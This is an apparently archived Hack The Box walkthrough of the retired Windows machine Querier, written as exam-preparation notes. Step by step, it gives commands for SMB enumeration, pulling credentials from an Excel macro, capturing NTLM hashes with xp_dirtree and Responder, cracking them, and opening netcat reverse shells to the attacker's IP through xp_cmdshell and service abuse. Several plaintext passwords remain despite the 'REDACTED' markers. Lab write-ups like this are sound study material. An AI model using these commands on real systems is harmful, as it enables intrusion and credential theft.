Hack The Box
Hack The Box: Querier Walkthrough
An archived walkthrough of the retired Hack The Box Querier machine, preserved from Abdullah Kareem's OSEP Prep preparation notes.

Machine: Querier
IP: 10.129.35.228
Attacker IP: 10.10.17.27
OS: Windows
Difficulty: Medium
Flags:
- User:
64979c[redacted]829bc1e239 - Root:
010a24[redacted]67b9387948
1. Reconnaissance
1.1 Why do we start with Nmap?
Before attacking any machine, we need to know what services are running, what ports are open, and what the operating system is. Nmap is the standard tool for network discovery and port scanning. We run two scans: a quick full port scan to find all open ports, and an aggressive scan on the interesting ports to get version information and run default scripts.
1.2 Commands Run
Full port scan (fast):
sudo nmap -p- -T4 10.129.35.228
Aggressive scan on discovered ports:
sudo nmap -p 135,139,445,1433,5985,47001 -sC -sV -A -T4 10.129.35.228 -oN querier_nmap.txt
1.3 Results & Analysis
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 RTM
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Key findings:
- Port 445 (SMB): File sharing is enabled. The scan also revealed:
Message signing enabled but not required. This is critical because it means we can perform NTLM relay/hash capture attacks later. If signing were required, captured hashes couldn't be relayed. - Port 1433 (MSSQL): Microsoft SQL Server 2017 is running. This is our primary attack vector.
- Ports 5985/47001 (WinRM): Windows Remote Management is available. Could be useful later for remote access if we get credentials.
- Hostname:
QUERIER.HTB.LOCAL
1.4 Adding to /etc/hosts
Because Windows authentication often relies on hostname resolution, we add the target to our hosts file:
echo "10.129.35.228 querier.htb.local" | sudo tee -a /etc/hosts
2. SMB Enumeration
2.1 Why check SMB first?
SMB (Server Message Block) is a common Windows file sharing protocol. Anonymous or null sessions often allow listing of shares, and sometimes shares contain sensitive files, credentials, or configuration data. It's always worth checking SMB early because it can provide quick wins.
2.2 Listing Shares
smbclient -L 10.129.35.228 -N
The -N flag means "no password" — we attempt a null session.
Results:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
The Reports share stands out because it's a custom share (not a default Windows share like ADMIN$ or C$).
2.3 Connecting to the Reports Share
smbclient \\10.129.35.228\Reports -N
Inside, we found:
Currency Volume Report.xlsm
We downloaded it:
get "Currency Volume Report.xlsm"
2.4 Why is an .xlsm file suspicious?
.xlsm stands for "Excel Macro-Enabled Workbook." Macros are scripts (typically written in VBA — Visual Basic for Applications) that can contain logic, including hardcoded credentials, database connection strings, or other sensitive information. Developers often accidentally hardcode credentials in macros.
3. Extracting Credentials from .xlsm
3.1 Understanding the .xlsm File Format
An .xlsm file is actually a ZIP archive containing XML files, binaries, and other resources. The macro code itself is stored in a binary file called vbaProject.bin inside the archive.
3.2 Extracting the Archive
unzip "Currency Volume Report.xlsm" -d xlsm_extracted
This creates a directory xlsm_extracted/ with the following structure:
xlsm_extracted/
├── [Content_Types].xml
├── _rels/
├── docProps/
└── xl/
├── vbaProject.bin <-- This contains the macro code
├── workbook.xml
├── worksheets/
└── ...
3.3 Searching for Credentials
We use the strings command to extract human-readable text from the binary macro file, then grep for credential-related keywords:
strings xlsm_extracted/xl/vbaProject.bin | grep -i -E "uid|pwd|password|user|server"
Output:
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=REDACTED
3.4 What did we find?
This is a database connection string hardcoded directly into the Excel macro. It contains:
- Username:
reporting - Password: REDACTED
- Database:
volume - Server:
QUERIER
Lesson: Never hardcode credentials in scripts, macros, or source code. They can be extracted with trivial effort.
4. Initial MSSQL Access
4.1 Why use impacket-mssqlclient?
MSSQL can be accessed in multiple ways, but impacket-mssqlclient (also known as mssqlclient.py) is one of the most reliable tools from the Impacket suite. It supports Windows authentication (-windows-auth), which is necessary when the SQL server is configured to use Windows accounts rather than SQL-native accounts.
4.2 Connecting to MSSQL
impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@10.129.35.228 -windows-auth
Note: The password contains a $ symbol. We wrap the entire user:password combination in quotes so the shell doesn't interpret the $ as a variable.
4.3 Checking Privileges
Once connected, we need to know what we can do. In MSSQL, sysadmin is the highest privilege level and allows executing operating system commands via xp_cmdshell.
SELECT SUSER_NAME();
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT USER_NAME();
Result:
- User:
QUERIER\reporting - Sysadmin:
0(FALSE)
We're not a sysadmin. This means we cannot directly use xp_cmdshell yet. We need to escalate within MSSQL first.
4.4 Initial Enumeration with xp_dirtree
Even without sysadmin, MSSQL has built-in "extended stored procedures" that interact with the OS. One of these is xp_dirtree, which lists directory contents.
EXEC xp_dirtree 'C:\Users', 1, 0;
Parameters explained:
'C:\Users'— The directory to list1— Depth (how many levels deep)0— List directories only (1 would include files too)
This revealed a user called mssql-svc, which is likely the service account running the SQL Server process. This becomes our next target.
5. Capturing the mssql-svc NTLM Hash
5.1 The Core Concept: Forced Authentication
When we run xp_dirtree and point it at an SMB share on our machine (\\10.10.17.27\fake_share\), Windows tries to authenticate to that share using the **current user's credentials** — in this case, the mssql-svc service account. Because SMB signing is not required on the target (we saw this in the nmap scan), we can stand up a malicious SMB server that captures the NTLM authentication handshake.
5.2 Why does this work?
- The SQL Server service runs as
mssql-svc - When SQL Server executes
xp_dirtreeagainst a remote UNC path, the OS initiates an SMB connection - The OS automatically tries to authenticate as the service account
- Our listener captures the NTLMv2 hash
- This is essentially a forced authentication or coerced authentication attack
5.3 Setting up the Listener
We use Responder, which listens for various authentication protocols (SMB, LLMNR, NBT-NS, etc.) and captures hashes:
sudo Responder -I tun0
The -I tun0 specifies our VPN interface.
5.4 Triggering the Authentication
Back in the MSSQL shell:
EXEC xp_dirtree '\\10.10.17.27\fake_share\', 1, 0;
What happens:
- The SQL Server process (running as
mssql-svc) tries to access\\10.10.17.27\fake_share\ - Responder responds to the SMB request
- The Windows machine sends an NTLMv2 authentication challenge/response
- Responder captures the hash
5.5 Captured Hash
[SMB] NTLMv2-SSP Client : 10.129.35.228
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:cbeb481c09a37c9b:[redacted retired-lab hash or flag]:...[snip]...
We saved this to mssql-svc.hash.
6. Cracking the Hash
6.1 What is an NTLMv2 Hash?
NTLMv2 is a challenge-response authentication protocol used in Windows. When we capture the hash, we don't get the plaintext password — we get a hash that represents the password encrypted with a nonce (challenge). We can crack this offline by trying many passwords and seeing which one produces the same hash.
6.2 Why use rockyou.txt?
rockyou.txt is a massive wordlist of real passwords leaked from the RockYou breach. It's the standard starting point for password cracking because it contains the most common passwords people actually use.
6.3 Cracking Commands
With Hashcat:
hashcat -m 5600 mssql-svc.hash /usr/share/wordlists/rockyou.txt
-m 5600specifies the hash mode for NTLMv2
With John the Ripper:
john mssql-svc.hash --wordlist=/usr/share/wordlists/rockyou.txt
6.4 Result
mssql-svc::QUERIER:...[snip]...:corporate568
Password: REDACTED
7. Getting a Shell as mssql-svc
7.1 Logging in as mssql-svc
impacket-mssqlclient mssql-svc:'corporate568'@10.129.35.228 -windows-auth
Check privileges again:
SELECT IS_SRVROLEMEMBER('sysadmin');
Result: 1 (TRUE)
We are now a sysadmin! This means we can enable and use xp_cmdshell to execute arbitrary Windows commands.
7.2 Enabling xp_cmdshell
xp_cmdshell is a powerful extended stored procedure that spawns a Windows command shell and passes a string for execution. It's disabled by default for security reasons, but as sysadmin we can re-enable it:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Explanation:
sp_configureis used to view or change server configuration optionsshow advanced optionsmust be enabled first before we can modifyxp_cmdshellRECONFIGUREapplies the changes
7.3 Getting a Reverse Shell
Why a reverse shell?
xp_cmdshell executes commands but doesn't give us an interactive shell. A reverse shell connects back to our attacker machine, giving us a persistent, interactive command prompt.
Setup:
Terminal 1: Start SMB server to host
nc.exe(Windows netcat binary)sudo python3 smbserver.py -smb2support shared /usr/share/windows-resources/binaries/Terminal 2: Start netcat listener
nc -lvnp 4444MSSQL Shell: Execute reverse shell
EXEC xp_cmdshell '\\10.10.17.27\shared\nc.exe -e cmd.exe 10.10.17.27 4444';
What happens:
nc.exeis copied from our SMB share and executed on the target-e cmd.exetells netcat to executecmd.exeand pipe its input/output through the network connection- The target connects back to our listener on port 4444
- We receive an interactive command prompt
7.4 Confirming Access
C:\Windows\system32> whoami
querier\mssql-svc
C:\Windows\system32> hostname
QUERIER
7.5 User Flag
type C:\Users\mssql-svc\Desktop\user.txt
Flag: 64979c3[redacted]829bc1e239
8. Privilege Escalation
8.1 Initial Enumeration
We check our current privileges:
whoami /priv
We likely see SeImpersonatePrivilege, which on older Windows versions allows "Potato" attacks. However, on Windows Server 2019, these are often patched. We need another path.
8.2 PowerUp.ps1 — Automated Privilege Escalation Checks
PowerUp.ps1 is part of PowerSploit, a collection of PowerShell modules for penetration testing. It automates the process of checking for common Windows privilege escalation vectors.
Transferring the file: We use the same SMB share technique:
copy \\10.10.17.27\shared\PowerUp.ps1 C:\Users\mssql-svc\Documents\
cd C:\Users\mssql-svc\Documents
Running PowerUp:
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
The -ep bypass flag sets the execution policy to bypass, allowing us to run unsigned PowerShell scripts.
8.3 PowerUp Results
PowerUp found multiple vulnerabilities:
Finding 1: UsoSvc Service Abuse
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
What is UsoSvc?
UsoSvc (Update Orchestrator Service) is a Windows system service that runs as LocalSystem. PowerUp discovered that we have permission to modify this service's configuration. The Invoke-ServiceAbuse function can modify the service to execute arbitrary commands as SYSTEM.
Finding 2: Group Policy Preferences (GPP)
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
What is GPP and why is this a vulnerability? Group Policy Preferences allowed administrators to create policies with embedded credentials (e.g., creating local admin accounts across domains). Microsoft encrypted these passwords using AES.
The critical flaw: Microsoft hardcoded the AES encryption key into every Windows installation, and then accidentally published this key in public MSDN documentation. This means anyone can decrypt GPP passwords. The key is publicly available, and tools like PowerUp automatically decrypt it.
Decrypted Administrator Password: REDACTED
8.4 Escalating to SYSTEM
We have two viable paths. We chose the most direct one.
Path Chosen: psexec.py with Admin Credentials
Since we already have the plaintext administrator password, we can use psexec.py (another Impacket tool) to remotely execute a service and get a SYSTEM shell:
impacket-psexec 'administrator:MyUnclesAreMarioAndLuigi!!1!@10.129.35.228'
How psexec works:
- Authenticates to the target using SMB with the provided credentials
- Uploads a small service executable to the
ADMIN$share - Creates and starts a Windows service on the target
- The service runs as
NT AUTHORITY\SYSTEM - Returns an interactive shell
Result:
C:\Windows\system32> whoami
nt authority\system
Alternative Path: UsoSvc Abuse
If we didn't have the GPP password, we could have abused the UsoSvc service:
Start a new netcat listener:
nc -lvp 6666In PowerUp:
Invoke-ServiceAbuse -Name 'UsoSvc' -Command "\\10.10.17.27\shared\nc.exe -e cmd.exe 10.10.17.27 6666"
This modifies the service to execute our netcat reverse shell command, which runs as SYSTEM when the service starts.
8.5 Root Flag
type C:\Users\Administrator\Desktop\root.txt
Flag: 010a24[redacted]b9387948
9. Conclusion & Key Takeaways
Attack Chain Summary
- SMB Enumeration → Found
Reportsshare with macro-enabled Excel file - Credential Harvesting → Extracted hardcoded MSSQL credentials from macro
- MSSQL Access → Connected as
reportinguser - Hash Capture → Used
xp_dirtree+ Responder to forcemssql-svcauthentication - Password Cracking → Cracked NTLMv2 hash offline
- Shell Access → Logged in as
mssql-svc(sysadmin), enabledxp_cmdshell, got reverse shell - Privilege Escalation → PowerUp found GPP password + vulnerable service
- SYSTEM Access → Used
psexec.pywith decrypted admin password
Critical Lessons
Hardcoded Credentials: The initial foothold came from credentials hardcoded in an Excel macro. Always check scripts, macros, and configuration files for secrets.
SMB Signing:
Message signing enabled but not requiredallowed us to capture the NTLM hash. In a properly hardened environment, SMB signing should be required.Forced Authentication:
xp_dirtreeand similar MSSQL procedures can trigger outbound SMB connections. Any SQL user can potentially force the service account to authenticate to an attacker-controlled server.Group Policy Preferences: GPP is a well-known Windows vulnerability. The encryption key is public, making GPP passwords trivial to decrypt. Always check for
Groups.xmlandScheduledTasks.xmlin Group Policy directories.Service Account Isolation: The
mssql-svcaccount had sysadmin privileges in SQL Server. Service accounts should have the minimum necessary privileges. Ifreportinghad been properly restricted, the hash capture might not have led to a full compromise.
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service detection |
| smbclient | SMB share enumeration and file transfer |
| unzip / strings | Extracting and analyzing .xlsm macros |
| impacket-mssqlclient | MSSQL connection and interaction |
| Responder | Capturing NTLM authentication hashes |
| hashcat / john | Offline password cracking |
| impacket-smbserver | Hosting SMB shares for file transfer |
| nc (netcat) | Reverse shells |
| PowerUp.ps1 | Automated Windows privilege escalation checks |
| impacket-psexec | Remote SYSTEM shell execution |
Machine Complete!